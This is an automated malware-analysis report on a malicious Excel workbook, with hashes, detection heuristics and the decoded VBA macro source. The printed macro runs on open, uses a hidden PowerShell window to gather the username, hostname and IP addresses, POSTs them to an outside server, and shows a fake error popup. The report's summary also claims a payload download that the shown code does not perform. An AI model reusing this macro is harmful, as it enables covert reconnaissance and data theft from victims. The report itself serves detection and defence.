Office (OOXML) malware analysis — malicious · f7ae113318c86712

MALICIOUS

Office (OOXML)

67.1 KB Created: 2016-05-09 14:45:54 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-06-02

MD5: d48c74b5b327c637fe90c6481b845794 SHA-1: 9ab92fd2b40e4a85f907c77a659e60ecc4a96110 SHA-256: f7ae113318c86712b79d54c73a7bca474b340cfd41469140d0cc0ec5dcfebc97

418 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Excel file containing a Workbook_Open macro that executes a PowerShell command. This command is designed to download a second-stage payload from the URL http://181.143.182.204/form.php and execute it. The macro also attempts to hide its activity by making sheets very hidden and using WScript.Shell to execute the PowerShell command in a hidden window.

Heuristics 10

ClamAV: Xls.Dropper.Agent-7755758-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7755758-0
VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Matched line in script
```
' Create shell object
Set objShell = CreateObject("Wscript.Shell")
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
' Create shell object
Set objShell = CreateObject("Wscript.Shell")
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

Dim objExec1
' Construct PowerShell Command (PS syntax)
' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select  -property IdentityReference, AccessControlType, FileSystemRights"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
' Create shell object
Set objShell = CreateObject("Wscript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 10 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://181.143.182.204/form.php In document text (OOXML body / shared strings)
- http://ipinfo.io/jsonIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5400 bytes
SHA-256: `3e44f007cf297a3f1a0e8db4000811d8c06cf910590df18af499382273898549`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) Sheets("Inicio").Visible = xlSheetVisible For Each ws In ThisWorkbook.Worksheets If ws.Name <> "Inicio" Then ws.Visible = xlVeryHidden End If Next ws ActiveWorkbook.Save End Sub Private Sub Workbook_Open() For Each ws In ThisWorkbook.Worksheets ws.Visible = xlSheetVisible Next ws Sheets("Inicio").Visible = xlVeryHidden Dim strPSCommand0 Dim strDOSCommand0 Dim strPSCommand1 Dim strDOSCommand1 Dim objShell Dim objShell1 Dim objExec Dim objExec1 ' Construct PowerShell Command (PS syntax) ' strPSCommand = "get-acl C:\temp \| foreach-object{ $_.Access } \|select -property IdentityReference, AccessControlType, FileSystemRights" strPSCommand = "$postParams = @{name = whoami ;cedula = hostname; celular = $ipV4 = Test-Connection -ComputerName (hostname) -Count 1 \| Select IPV4Address; email = Invoke-RestMethod http://ipinfo.io/json \| Select -exp ip}; Invoke-WebRequest -Uri http://181.143.182.204/form.php -Method POST -Body $postParams" ' Consruct DOS command to pass PowerShell command (DOS syntax) strDOSCommand = "powershell -windowstyle hidden -command " & strPSCommand & "" ' Create shell object Set objShell = CreateObject("Wscript.Shell") ' Execute the combined command Set objExec = objShell.Exec(strDOSCommand) ' Read output into VBS variable strPSResults = objExec.StdOut.ReadAll strPSCommand1 = "$wshell = New-Object -ComObject Wscript.Shell; $wshell.Popup('Error x00000001312377',0,'System Message',64+1)" strDOSCommand1 = "powershell -windowstyle hidden -command " & strPSCommand1 & "" Set objShell1 = CreateObject("Wscript.Shell") Set objExec11 = objShell.Exec(strDOSCommand1) End Sub Attribute VB_Name = "Hoja1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja7" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja8" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja9" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja10" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	50688 bytes
SHA-256: `3c9cf9953503a19741a1c9abec749818a232637a7c34bae87f747e18d7367e57`
Detection ClamAV: Xls.Dropper.Agent-7755758-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.